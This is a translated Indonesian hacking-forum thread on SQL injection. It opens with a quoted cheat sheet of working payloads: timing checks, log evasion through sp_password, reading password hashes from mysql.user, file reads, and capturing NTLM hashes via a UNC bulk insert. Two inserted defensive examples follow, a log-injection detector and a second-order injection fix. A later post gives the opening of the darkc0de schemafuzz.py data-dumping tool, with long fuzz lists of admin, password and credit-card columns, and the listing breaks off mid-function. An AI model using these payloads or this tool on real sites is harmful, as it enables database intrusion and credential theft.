    BENCHMARK() (M)

    Basically we are abusing this command to make MySQL wait a bit. Be careful, you will consume the web server's limit very fast!

    BENCHMARK(howmanytimes, do this)
    Real World Samples

    * Are we root ? woot!
    IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))

    * Check Table exist in MySQL
    IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))

    pg_sleep(seconds) (P)

    Sleep for supplied seconds.

    * SELECT pg_sleep(10);
    Sleep 10 seconds.

    Covering Tracks
    SQL Server -sp_password log bypass (S)

    SQL Server doesn't log queries which include sp_password, for security reasons(!). So if you add --sp_password to your queries it will not be in the SQL Server logs (of course it will still be in the web server logs; try to use POST if possible).
    Clear SQL Injection Tests

    These tests are simply good for blind sql injection and silent attacks.

    1. product.asp?id=4 (SMO)
    1. product.asp?id=5-1
    2. product.asp?id=4 OR 1=1

    2. product.asp?name=Book
    1. product.asp?name=Bo'%2b'ok
    2. product.asp?name=Bo' || 'ok (OM)
    3. product.asp?name=Book' OR 'x'='x

    Some Extra MySQL Notes

    * Sub queries only work in MySQL 4.1+
    * Users
    o SELECT User,Password FROM mysql.user;
    * SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = 'root';
    * SELECT ... INTO DUMPFILE
    o Write query into a new file (can not modify existing files)
    * UDF Function
    o create function LockWorkStation returns integer soname 'user32';
    o select LockWorkStation();
    o create function ExitProcess returns integer soname 'kernel32';
    o select exitprocess();
    * SELECT USER();
    * SELECT password,USER() FROM mysql.user;
    * First byte of admin hash
    o SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;
    * Read File
    o query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
    * MySQL LOAD DATA INFILE
    o By default it's not available!
    + create table foo( line blob );
    load data infile 'c:/boot.ini' into table foo;
    select * from foo;
    * More Timing in MySQL
    * select benchmark( 500000, sha1( 'test' ) );
    * query.php?user=1+union+select+benchmark(500000,sha1(0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
    * select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' );
    Enumerating data, guessed brute force
    o select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1('test')), 'false' );

    Potentially Useful MySQL Functions

    * MD5()
    MD5 Hashing
    * SHA1()
    SHA1 Hashing

    * PASSWORD()
    * ENCODE()
    * COMPRESS()
    Compress data; can be very useful for reading large binary data in blind SQL injections.
    * ROW_COUNT()
    * SCHEMA()
    * VERSION()
    Same as @@version

    Second Order SQL Injections

    Basically you put an SQL injection in some place and expect it to be unfiltered in another action. This is a common hidden-layer problem.

    Name : ' + (SELECT TOP 1 password FROM users ) + '
    Email : xx@xx.com

    If the application is using the name field in an unsafe stored procedure, function, process etc., then it will insert the first user's password as your name etc.
    Forcing SQL Server to get NTLM Hashes

    This attack can help you get the Windows password of the SQL Server user on the target server, but your inbound connection will possibly be firewalled. It can be very useful in internal penetration tests. We force SQL Server to connect to our Windows UNC share and capture the NTLM session data with a tool like Cain & Abel.
    Bulk insert from a UNC Share (S)
    bulk insert foo from '\\YOURIPADDRESS\C$\x.txt'
    Last edited by nveuu; 13-05-09 at 22:12.
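As an added example (my code, not part of nveuu's post or of the cheat sheet it quotes), here is how a defender would turn the indicators listed above (waitfor delay, BENCHMARK, pg_sleep, sp_password, load_file, INTO DUMPFILE, bulk insert from a UNC path, mysql.user / information_schema access) into detection over web-server access log lines. The request target is URL-decoded repeatedly to catch double encoding, inline /**/ comments are flattened, and each rule is matched case-insensitively. The log lines and the rule names are constructed for this demo.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the cheat sheet above; the rule names are my own labels.
RULES = [
    ("time-based-mssql", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("time-based-mysql", re.compile(r"\bbenchmark\s*\(", re.I)),
    ("time-based-pgsql", re.compile(r"\bpg_sleep\s*\(", re.I)),
    ("sp_password-log-bypass", re.compile(r"sp_password", re.I)),
    ("file-read", re.compile(r"\bload_file\s*\(", re.I)),
    ("file-write", re.compile(r"\binto\s+(?:dump|out)file\b", re.I)),
    ("unc-bulk-insert", re.compile(r"\bbulk\s+insert\b.*\\\\", re.I)),
    ("system-table-access", re.compile(r"\b(?:information_schema\.|mysql\.user\b)", re.I)),
]

# Request target in a common/combined log format line: "GET /path?query HTTP/1.1"
REQ_RE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)')


def normalize(request):
    """URL-decode until stable (max 3 rounds, catches double encoding),
    then flatten inline comments and runs of whitespace."""
    cur = request
    for _ in range(3):
        nxt = unquote_plus(cur)
        if nxt == cur:
            break
        cur = nxt
    cur = re.sub(r"/\*.*?\*/", " ", cur)
    return re.sub(r"\s+", " ", cur)


def scan_line(line):
    """Return the names of all rules that fire on one log line (in RULES order)."""
    m = REQ_RE.search(line)
    if not m:
        return []
    text = normalize(m.group(1))
    return [name for name, rx in RULES if rx.search(text)]


def scan_log(lines):
    """Map 1-based line number -> rule names, for lines that trip at least one rule."""
    hits = {}
    for n, line in enumerate(lines, 1):
        names = scan_line(line)
        if names:
            hits[n] = names
    return hits


# Constructed sample log lines (combined log format, 192.0.2.0/24 documentation addresses).
SAMPLE_LOG = [
    '192.0.2.5 - - [13/May/2009:22:12:01 +0700] "GET /product.asp?id=1%29%29%3Bwaitfor+delay+%270%3A0%3A10%27-- HTTP/1.1" 200 512',
    '192.0.2.5 - - [13/May/2009:22:12:02 +0700] "GET /news.php?id=-1+union+select+1,benchmark(500000,sha1(0x414141)),3+from+mysql.user-- HTTP/1.1" 200 88',
    '192.0.2.9 - - [13/May/2009:22:12:03 +0700] "GET /product.asp?id=4 HTTP/1.1" 200 2048',
    '192.0.2.5 - - [13/May/2009:22:12:04 +0700] "GET /catalog.asp?id=1;bulk+insert+foo+from+%27%5C%5C192.0.2.10%5Cshare%5Cx.txt%27--sp_password HTTP/1.1" 500 310',
    '192.0.2.5 - - [13/May/2009:22:12:05 +0700] "GET /query.php?user=1+union+select+load_file(0x2f6574632f706173737764),1,1 HTTP/1.1" 200 1900',
    '192.0.2.5 - - [13/May/2009:22:12:06 +0700] "GET /product.asp?id=1+or+pg_sleep%252810%2529 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for n, names in sorted(scan_log(SAMPLE_LOG).items()):
        print("line %d: %s" % (n, ", ".join(names)))
```

The benign request on line 3 produces no hit; line 6 only fires because the decoder runs more than once. In production this would run on the decoded request as the application saw it (or on POST bodies, which the sp_password note above points out never reach the web server's access log at all), and the time-based rules would be paired with response-time outliers rather than used alone.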
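The second-order case from the post, shown as an added example (my code, not from the post or the cheat sheet it quotes): the sign-up step stores the name safely with a bound parameter, and a later action re-reads it and concatenates it into a new statement, which is exactly where the stored value turns into SQL. The hardened variant binds the value again on reuse. The schema, data and the SQLite-flavoured payload (|| and LIMIT in place of SQL Server's + and TOP) are constructed for this demo.

```python
import sqlite3


# Constructed demo schema and data (not from the page).
def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("CREATE TABLE profiles (id INTEGER PRIMARY KEY, display_name TEXT, email TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cretHashValue')")
    conn.commit()
    return conn


# Step 1: the sign-up form. This INSERT is parameterised, so whatever the user
# typed as their name is stored verbatim as data; nothing goes wrong here yet.
def register(conn, display_name, email):
    cur = conn.execute(
        "INSERT INTO profiles (display_name, email) VALUES (?, ?)",
        (display_name, email),
    )
    conn.commit()
    return cur.lastrowid


# Step 2, vulnerable: a later action re-reads the stored name, treats it as
# trusted because "it came from our own database", and splices it into new SQL.
def greeting_vulnerable(conn, profile_id):
    (name,) = conn.execute(
        "SELECT display_name FROM profiles WHERE id = ?", (profile_id,)
    ).fetchone()
    stmt = "SELECT 'Hello, ' || '" + name + "'"  # stored data becomes SQL text
    return conn.execute(stmt).fetchone()[0]


# Step 2, hardened: same lookup, but the stored value is bound as a parameter
# every time it is reused, so it can never alter the statement's structure.
def greeting_hardened(conn, profile_id):
    (name,) = conn.execute(
        "SELECT display_name FROM profiles WHERE id = ?", (profile_id,)
    ).fetchone()
    return conn.execute("SELECT 'Hello, ' || ?", (name,)).fetchone()[0]


# The post's payload adapted to SQLite: close the string literal, append a
# subquery, reopen the literal so the statement stays syntactically valid.
PAYLOAD = "' || (SELECT password FROM users LIMIT 1) || '"


def demo():
    """Register a profile whose name is the payload, then read it back both ways."""
    conn = setup_db()
    pid = register(conn, PAYLOAD, "second.order@example.com")
    return greeting_vulnerable(conn, pid), greeting_hardened(conn, pid)


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable path returned:", leaked)  # contains the admin password
    print("hardened path returned:  ", safe)    # the stored name echoed back
```

The lesson is the one the post states in one line: a value being "already in the database" says nothing about its safety, so every reuse of stored data in SQL needs the same parameter binding as the original write.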

  12. #26

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    eh.. he just copy-pasted the blind SQLi stuff, well I'm not a translator.. maybe I'll just give a clue if you want to become an expert in this vuln (I'm no expert, since my web programming is lousy; if it's socket stuff, sure, bring it on )
    - first learn SQL queries in detail, there are lots of books on it.. then build on that with injections.. good luck^^

  13. #27
    nveuu's Avatar
    Join Date
    Apr 2007
    Location
    di warnet
    Posts
    2,496
    Points
    494.79
    Thanks: 36 / 20 / 11

    Default

    Quote Originally Posted by bl00d13z View Post
    eh.. he just copy-pasted the blind SQLi stuff, well I'm not a translator.. maybe I'll just give a clue if you want to become an expert in this vuln (I'm no expert, since my web programming is lousy; if it's socket stuff, sure, bring it on )
    - first learn SQL queries in detail, there are lots of books on it.. then build on that with injections.. good luck^^
    hahahahahag...
    can I request the ebook, master... but one in Indonesian

    my web programming is lousy too ...

  14. #28
    chikebum's Avatar
    Join Date
    Nov 2006
    Posts
    3,396
    Points
    4,709.22
    Thanks: 13 / 294 / 69

    Default

    *damn script kiddies trying to be l33t =D

    echo "script kiddies" > /dev/null

  15. #29
    PeCuNnN's Avatar
    Join Date
    Oct 2006
    Location
    .:[- IndoGamers -]:.
    Posts
    3,608
    Points
    4,396.90
    Thanks: 0 / 42 / 28

    Default

    Quote Originally Posted by chikebum View Post
    *damn script kiddies trying to be l33t =D

    echo "script kiddies" > /dev/null
    bum, where's that script you gave me that gets you a root account straight away =D
    ARIKANAMI

    RMD_RetroooRTR

  16. #30

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Quote Originally Posted by nveuu View Post
    hahahahahag...
    can I request the ebook, master... but one in Indonesian

    my web programming is lousy too ...
    whoa.. I don't have an Indonesian one bro, just request it in the e-book thread later.. who knows, somebody might have one. btw I'll continue the SQLi using a script tool.. its features include:
    - auto find column
    - data extractor (schema for SQL 5++ & fuzz technique for SQL 4++)
    - process log facility

    Spoiler for schemafuzz.py :

    Code:
    #!/usr/bin/python
    ################################################################ 
    #       .___             __          _______       .___        # 
    #     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
    #    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
    #   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
    #   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
    #        \/                  \/             \/                 # 
    #                   ___________   ______  _  __                # 
    #                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
    #                 \  \___|  | \/\  ___/\     /                 # 
    #                  \___  >__|    \___  >\/\_/                  # 
    #      est.2007        \/            \/   forum.darkc0de.com   # 
    ################################################################ 
    # MySQL Injection Schema, Dataext, and fuzzer
    
    # Share the c0de!
    
    # Darkc0de Team 
    # www.darkc0de.com 
    # rsauron[at]gmail[dot]com
    
    # Greetz to 
    # d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx, 
    # and the darkc0de crew
    
    # NOTES: 
    # Proxy function may be a little buggy if your using public proxies... Test your proxy prior to using it with this script..
    # The script does do a little proxy test.. it does a GET to google.com if data comes back its good... no data = failed and the proxy 
    # will not be used. This is a effort to keep the script from getting stuck in a endless loop.
    # Any other questions Hit the forums and ask questions. google is your friend!
    
    # This was written for educational purpose only. Use it at your own risk.
    # Author will be not responsible for any damage!
    # Intended for authorized Web Application Pen Testing!
    
    # BE WARNED, THIS TOOL IS VERY LOUD..
    
    #Set default evasion options here
    arg_end = "--"
    arg_eva = "+"
    
    #colMax variable for column Finder
    colMax = 205
    #Fill in the tables you want tested here.
    fuzz_tables = ['tbladmins', 'sort', '_wfspro_admin', '4images_users', 'a_admin', 'account', 'accounts', 'adm', 'admin', 'admin_login', 'admin_user', 'admin_userinfo', 'administer', 'administrable', 'administrate', 'administration', 'administrator', 'administrators', 'adminrights', 'admins', 'adminuser', 'art', 'article_admin', 'articles', 'artikel', '\xc3\x83\xc3\x9c\xc3\x82\xc3\xab', 'aut', 'author', 'autore', 'backend', 'backend_users', 'backenduser', 'bbs', 'book', 'chat_config', 'chat_messages', 'chat_users', 'client', 'clients', 'clubconfig', 'company', 'config', 'contact', 'contacts', 'content', 'control', 'cpg_config', 'cpg132_users', 'customer', 'customers', 'customers_basket', 'dbadmins', 'dealer', 'dealers', 'diary', 'download', 'Dragon_users', 'e107.e107_user', 'e107_user', 'forum.ibf_members', 'fusion_user_groups', 'fusion_users', 'group', 'groups', 'ibf_admin_sessions', 'ibf_conf_settings', 'ibf_members', 'ibf_members_converge', 'ibf_sessions', 'icq', 'images', 'index', 'info', 'ipb.ibf_members', 'ipb_sessions', 'joomla_users', 'jos_blastchatc_users', 'jos_comprofiler_members', 'jos_contact_details', 'jos_joomblog_users', 'jos_messages_cfg', 'jos_moschat_users', 'jos_users', 'knews_lostpass', 'korisnici', 'kpro_adminlogs', 'kpro_user', 'links', 'login', 'login_admin', 'login_admins', 'login_user', 'login_users', 'logins', 'logon', 'logs', 'lost_pass', 'lost_passwords', 'lostpass', 'lostpasswords', 'm_admin', 'main', 'mambo_session', 'mambo_users', 'manage', 'manager', 'mb_users', 'member', 'memberlist', 'members', 'minibbtable_users', 'mitglieder', 'movie', 'movies', 'mybb_users', 'mysql', 'mysql.user', 'name', 'names', 'news', 'news_lostpass', 'newsletter', 'nuke_authors', 'nuke_bbconfig', 'nuke_config', 'nuke_popsettings', 'nuke_users', '\xc3\x93\xc3\x83\xc2\xbb\xc2\xa7', 'obb_profiles', 'order', 'orders', 'parol', 'partner', 'partners', 'passes', 'password', 'passwords', 'perdorues', 'perdoruesit', 'phorum_session', 'phorum_user', 
'phorum_users', 'phpads_clients', 'phpads_config', 'phpbb_users', 'phpBB2.forum_users', 'phpBB2.phpbb_users', 'phpmyadmin.pma_table_info', 'pma_table_info', 'poll_user', 'punbb_users', 'pwd', 'pwds', 'reg_user', 'reg_users', 'registered', 'reguser', 'regusers', 'session', 'sessions', 'settings', 'shop.cards', 'shop.orders', 'site_login', 'site_logins', 'sitelogin', 'sitelogins', 'sites', 'smallnuke_members', 'smf_members', 'SS_orders', 'statistics', 'superuser', 'sysadmin', 'sysadmins', 'system', 'sysuser', 'sysusers', 'table', 'tables', 'tb_admin', 'tb_administrator', 'tb_login', 'tb_member', 'tb_members', 'tb_user', 'tb_username', 'tb_usernames', 'tb_users', 'tbl', 'tbl_user', 'tbl_users', 'tbluser', 'tbl_clients', 'tbl_client', 'tblclients', 'tblclient', 'test', 'usebb_members', 'user', 'user_admin', 'user_info', 'user_list', 'user_login', 'user_logins', 'user_names', 'usercontrol', 'userinfo', 'userlist', 'userlogins', 'username', 'usernames', 'userrights', 'users', 'vb_user', 'vbulletin_session', 'vbulletin_user', 'voodoo_members', 'webadmin', 'webadmins', 'webmaster', 'webmasters', 'webuser', 'webusers', 'x_admin', 'xar_roles', 'xoops_bannerclient', 'xoops_users', 'yabb_settings', 'yabbse_settings', 'ACT_INFO', 'ActiveDataFeed', 'Category', 'CategoryGroup', 'ChicksPass', 'ClickTrack', 'Country', 'CountryCodes1', 'CustomNav', 'DataFeedPerformance1', 'DataFeedPerformance2', 'DataFeedPerformance2_incoming', 'DataFeedShowtag1', 'DataFeedShowtag2', 'DataFeedShowtag2_incoming', 'dtproperties', 'Event', 'Event_backup', 'Event_Category', 'EventRedirect', 'Events_new', 'Genre', 'JamPass', 'MyTicketek', 'MyTicketekArchive', 'News', 'Passwords by usage count', 'PerfPassword', 'PerfPasswordAllSelected', 'Promotion', 'ProxyDataFeedPerformance', 'ProxyDataFeedShowtag', 'ProxyPriceInfo', 'Region', 'SearchOptions', 'Series', 'Sheldonshows', 'StateList', 'States', 'SubCategory', 'Subjects', 'Survey', 'SurveyAnswer', 'SurveyAnswerOpen', 'SurveyQuestion', 'SurveyRespondent', 
'sysconstraints', 'syssegments', 'tblRestrictedPasswords', 'tblRestrictedShows', 'Ticket System Acc Numbers', 'TimeDiff', 'Titles', 'ToPacmail1', 'ToPacmail2', 'Total Members', 'UserPreferences', 'uvw_Category', 'uvw_Pref', 'uvw_Preferences', 'Venue', 'venues', 'VenuesNew', 'X_3945', 'stone list', 'tblArtistCategory', 'tblArtists', 'tblConfigs', 'tblLayouts', 'tblLogBookAuthor', 'tblLogBookEntry', 'tblLogBookImages', 'tblLogBookImport', 'tblLogBookUser', 'tblMails', 'tblNewCategory', 'tblNews', 'tblOrders', 'tblStoneCategory', 'tblStones', 'tblUser', 'tblWishList', 'VIEW1', 'viewLogBookEntry', 'viewStoneArtist', 'vwListAllAvailable', 'CC_info', 'CC_username', 'cms_user', 'cms_users', 'cms_admin', 'cms_admins', 'user_name', 'jos_user', 'table_user', 'email', 'mail', 'bulletin', 'cc_info', 'login_name', 'admuserinfo', 'userlistuser_list', 'SiteLogin', 'Site_Login', 'UserAdmin', 'Admins', 'Login', 'Logins']
    #Fill in the columns you want tested here.
    fuzz_columns = ['user', 'username', 'password', 'passwd', 'pass', 'cc_number', 'id', 'email', 'emri', 'fjalekalimi', 'pwd', 'user_name', 'customers_email_address', 'customers_password', 'user_password', 'name', 'user_pass', 'admin_user', 'admin_password', 'admin_pass', 'usern', 'user_n', 'users', 'login', 'logins', 'login_user', 'login_admin', 'login_username', 'user_username', 'user_login', 'auid', 'apwd', 'adminid', 'admin_id', 'adminuser', 'adminuserid', 'admin_userid', 'adminusername', 'admin_username', 'adminname', 'admin_name', 'usr', 'usr_n', 'usrname', 'usr_name', 'usrpass', 'usr_pass', 'usrnam', 'nc', 'uid', 'userid', 'user_id', 'myusername', 'mail', 'emni', 'logohu', 'punonjes', 'kpro_user', 'wp_users', 'emniplote', 'perdoruesi', 'perdorimi', 'punetoret', 'logini', 'llogaria', 'fjalekalimin', 'kodi', 'emer', 'ime', 'korisnik', 'korisnici', 'user1', 'administrator', 'administrator_name', 'mem_login', 'login_password', 'login_pass', 'login_passwd', 'login_pwd', 'sifra', 'lozinka', 'psw', 'pass1word', 'pass_word', 'passw', 'pass_w', 'user_passwd', 'userpass', 'userpassword', 'userpwd', 'user_pwd', 'useradmin', 'user_admin', 'mypassword', 'passwrd', 'admin_pwd', 'admin_passwd', 'mem_password', 'memlogin', 'e_mail', 'usrn', 'u_name', 'uname', 'mempassword', 'mem_pass', 'mem_passwd', 'mem_pwd', 'p_word', 'pword', 'p_assword', 'myname', 'my_username', 'my_name', 'my_password', 'my_email', 'cvvnumber ', 'about', 'access', 'accnt', 'accnts', 'account', 'accounts', 'admin', 'adminemail', 'adminlogin', 'adminmail', 'admins', 'aid', 'aim', 'auth', 'authenticate', 'authentication', 'blog', 'cc_expires', 'cc_owner', 'cc_type', 'cfg', 'cid', 'clientname', 'clientpassword', 'clientusername', 'conf', 'config', 'contact', 'converge_pass_hash', 'converge_pass_salt', '*****', 'customer', 'customers', 'cvvnumber]', 'data', 'db_database_name', 'db_hostname', 'db_password', 'db_username', 'download', 'e-mail', 'emailaddress', 'full', 'gid', 'group', 'group_name', 'hash', 
'hashsalt', 'homepage', 'icq', 'icq_number', 'id_group', 'id_member', 'images', 'index', 'ip_address', 'last_ip', 'last_login', 'lastname', 'log', 'login_name', 'login_pw', 'loginkey', 'loginout', 'logo', 'md5hash', 'member', 'member_id', 'member_login_key', 'member_name', 'memberid', 'membername', 'members', 'new', 'news', 'nick', 'number', 'nummer', 'pass_hash', 'passwordsalt', 'passwort', 'personal_key', 'phone', 'privacy', 'pw', 'pwrd', 'salt', 'search', 'secretanswer', 'secretquestion', 'serial', 'session_member_id', 'session_member_login_key', 'sesskey', 'setting', 'sid', 'spacer', 'status', 'store', 'store1', 'store2', 'store3', 'store4', 'table_prefix', 'temp_pass', 'temp_password', 'temppass', 'temppasword', 'text', 'un', 'user_email', 'user_icq', 'user_ip', 'user_level', 'user_passw', 'user_pw', 'user_pword', 'user_pwrd', 'user_un', 'user_uname', 'user_usernm', 'user_usernun', 'user_usrnm', 'userip', 'userlogin', 'usernm', 'userpw', 'usr2', 'usrnm', 'usrs', 'warez', 'xar_name', 'xar_pass']
    
    import urllib, sys, re, os, socket, httplib, urllib2, time, random
    
    #determine platform
    if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
    	SysCls = 'clear'
    elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
    	SysCls = 'cls'
    else:
    	SysCls = 'unknown'
    
    #say hello
    os.system(SysCls)
    if len(sys.argv) <= 1:
            print "\n|---------------------------------------------------------------|"
            print "| rsauron[@]gmail[dot]com                                v5.0   |"
            print "|   6/2008      schemafuzz.py                                   |"
            print "|      -MySQL v5+ Information_schema Database Enumeration       |"
            print "|      -MySQL v4+ Data Extractor                                |"
            print "|      -MySQL v4+ Table & Column Fuzzer                         |"
            print "| Usage: schemafuzz.py [options]                                |"
            print "|                      -h help                    darkc0de.com  |"
            print "|---------------------------------------------------------------|\n"
            sys.exit(1)
    			
    
    #help option
    for arg in sys.argv:
            if arg == "-h":
                    print "   Usage: ./schemafuzz.py [options]                          rsauron[@]gmail[dot]com darkc0de.com"
                    print "\tModes:"
                    print "\tDefine: --dbs     Shows all databases user has access too.               MySQL v5+"
                    print "\tDefine: --schema  Enumerate Information_schema Database.                 MySQL v5+"
                    print "\tDefine: --full    Enumerates all databases information_schema table      MySQL v5+"
                    print "\tDefine: --dump    Extract information from a Database, Table and Column. MySQL v4+"
                    print "\tDefine: --fuzz    Fuzz Tables and Columns.                               MySQL v4+"
                    print "\tDefine: --findcol Finds Columns length of a SQLi                         MySQL v4+"
                    print "\tDefine: --info    Gets MySQL server configuration only.                  MySQL v4+"
                    print "\n\tRequired:"
                    print "\tDefine: -u        URL \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
                    print "\n\tMode dump and schema options:"
                    print "\tDefine: -D        \"database_name\""
                    print "\tDefine: -T        \"table_name\""
                    print "\tDefine: -C        \"column_name,column_name...\""
                    print "\n\tOptional:"
                    print "\tDefine: -p        \"127.0.0.1:80 or proxy.txt\""
                    print "\tDefine: -o        \"ouput_file_name.txt\"        Default is schemafuzzlog.txt"
                    print "\tDefine: -r        row number to start at"
                    print "\tDefine: -v        Verbosity off option. Will not display row #'s in dump mode."   
                    print "\n   Ex: ./schemafuzz.py --info -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
                    print "   Ex: ./schemafuzz.py --dbs -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\""
                    print "   Ex: ./schemafuzz.py --schema -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D catalog -T orders -r 200"
                    print "   Ex: ./schemafuzz.py --dump -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D joomla -T jos_users -C username,password"
                    print "   Ex: ./schemafuzz.py --fuzz -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -end \"/*\" -o sitelog.txt"
                    print "   Ex: ./schemafuzz.py --findcol -u \"www.site.com/news.php?id=22\""
                    sys.exit(1) 
    
    #define varablies
    site = ""
    dbt = "schemafuzzlog.txt"
    proxy = "None"
    count = 0
    arg_table = "None"
    arg_database = "None"
    arg_columns = "None"
    arg_row = "Rows"
    arg_verbose = 1
    darkc0de = "concat(0x1e,0x1e,"
    mode = "None"
    line_URL = ""
    count_URL = ""
    gets = 0
    cur_db = ""
    cur_table = ""
    table_num = 0
    terminal = ""
    num = 0
    
    
    #Check args
    for arg in sys.argv:
    	if arg == "-u":
    		site = sys.argv[count+1]
    	elif arg == "-o":
    		dbt = sys.argv[count+1]
    	elif arg == "-p":
    		proxy = sys.argv[count+1]
    	elif arg == "--dump":
                    mode = arg
                    arg_dump = sys.argv[count]
            elif arg == "--full":
                    mode = arg
            elif arg == "--schema":
                    mode = arg
                    arg_schema = sys.argv[count]
            elif arg == "--dbs":
                    mode = arg
                    arg_dbs = sys.argv[count]
            elif arg == "--fuzz":
                    mode = arg
                    arg_fuzz = sys.argv[count]
            elif arg == "--info":
                    mode = arg
                    arg_info = sys.argv[count]
            elif arg == "--findcol":
                    mode = arg
                    arg_findcol = sys.argv[count]
    	elif arg == "-D":
    		arg_database = sys.argv[count+1]
    	elif arg == "-T":
    		arg_table = sys.argv[count+1]
    	elif arg == "-C":
    		arg_columns = sys.argv[count+1]
    	elif arg == "-end":
                    arg_end = sys.argv[count+1]
                    if arg_end == "--":
                            arg_eva = "+"
                    else:
                            arg_eva = "/**/"
    	elif arg == "-r":
                    num = sys.argv[count+1]
                    table_num = num
            elif arg == "-v":
                    arg_verbose = sys.argv[count]
                    arg_verbose = 0
    	count+=1
    
    #Title write
    file = open(dbt, "a")
    print "\n|---------------------------------------------------------------|"
    print "| rsauron[@]gmail[dot]com                                v5.0   |"
    print "|   6/2008      schemafuzz.py                                   |"
    print "|      -MySQL v5+ Information_schema Database Enumeration       |"
    print "|      -MySQL v4+ Data Extractor                                |"
    print "|      -MySQL v4+ Table & Column Fuzzer                         |"
    print "| Usage: schemafuzz.py [options]                                |"
    print "|                      -h help                    darkc0de.com  |"
    print "|---------------------------------------------------------------|"
    file.write("\n|---------------------------------------------------------------|")
    file.write("\n| rsauron[@]gmail[dot]com                                v5.0   |")
    file.write("\n|   6/2008      schemafuzz.py                                   |")
    file.write("\n|      -MySQL v5+ Information_schema Database Enumeration       |")
    file.write("\n|      -MySQL v4+ Data Extractor                                |")
    file.write("\n|      -MySQL v4+ Table & Column Fuzzer                         |")
    file.write("\n| Usage: schemafuzz.py [options]                                |")
    file.write("\n|                      -h help                    darkc0de.com  |")
    file.write("\n|---------------------------------------------------------------|")
    
    #Arg Error Checking
    if site == "":
            print "\n[-] Must include -u flag and specify a mode."
            print "[-] For help -h\n"
            sys.exit(1)
    if mode == "None":
            print "\n[-] Mode must be specified --schema, --dbs, --dump, --fuzz, --info, --full, --findcol."
            print "[-] For help -h\n"
            sys.exit(1)
    if mode == "--schema" and arg_database == "None":
            print "[-] Must include -D flag!"
            print "[-] For Help -h\n"
            sys.exit(1)
    if mode == "--dump":
            if arg_table == "None" or arg_columns == "None":
                    print "[-] If MySQL v5+ must include -D, -T and -C flag when --dump specified!"
                    print "[-] If MySQL v4+ must include -T and -C flag when --dump specified!"
                    print "[-] For help -h\n"
                    sys.exit(1)
    if mode != "--findcol" and site.find("darkc0de") == -1: 
    	print "\n[-] Site must contain \'darkc0de\'\n" 
    	sys.exit(1)
    if proxy != "None":
            if len(proxy.split(".")) == 2:
                    proxy = open(proxy, "r").read()
            if proxy.endswith("\n"):
                    proxy = proxy.rstrip("\n")
            proxy = proxy.split("\n")
    if arg_columns != "None":
            arg_columns = arg_columns.split(",")
    if site[:7] != "http://": 
    	site = "http://"+site
    if site.endswith("/*"):
    	site = site.rstrip('/*')
    if site.endswith("--"):
    	site = site.rstrip('--')
    	
    #Getting the URL ready with the evasion options we selected
    site = site.replace("+",arg_eva)
    site = site.replace("/**/",arg_eva)
    print "\n[+] URL:",site+arg_end
    file.write("\n\n[+] URL:"+site+arg_end+"\n")
    print "[+] Evasion Used:","\""+arg_eva+"\" \""+arg_end+"\""
    file.write("[+] Evasion Used: \""+str(arg_eva)+"\" \""+str(arg_end)+"\"")
    print "[+] %s" % time.strftime("%X")
    file.write("\n[+] %s" % time.strftime("%X"))
    
    #Build proxy list
    socket.setdefaulttimeout(20)
    proxy_list = []
    if proxy != "None":
    	file.write("\n[+] Building Proxy List...")
    	print "[+] Building Proxy List..."
    	for p in proxy:
    		try:
    			proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
    			opener = urllib2.build_opener(proxy_handler)
    			gets+=1
    			opener.open("http://www.google.com")
    			proxy_list.append(urllib2.build_opener(proxy_handler))
    			file.write("\n\tProxy:"+p+"- Success")
    			print "\tProxy:",p,"- Success"
    		except:
    			file.write("\n\tProxy:"+p+"- Failed")
    			print "\tProxy:",p,"- Failed"
    			pass
    	if len(proxy_list) == 0:
    		print "[-] All proxies have failed. App Exiting"
    		sys.exit(1) 
    	print "[+] Proxy List Complete"
    	file.write("\n[+] Proxy List Complete")
    else:
    	print "[-] Proxy Not Given"
    	file.write("\n[+] Proxy Not Given")
    	proxy_list.append(urllib2.build_opener())
    proxy_num = 0
    proxy_len = len(proxy_list)
    
    #colFinder
    if mode == "--findcol":
            print "[+] Attempting To find the number of columns..."
            file.write("\n[+] Attempting To find the number of columns...")
            print "[+] Testing: ",
            file.write("\n[+] Testing: ",)
            checkfor=[]
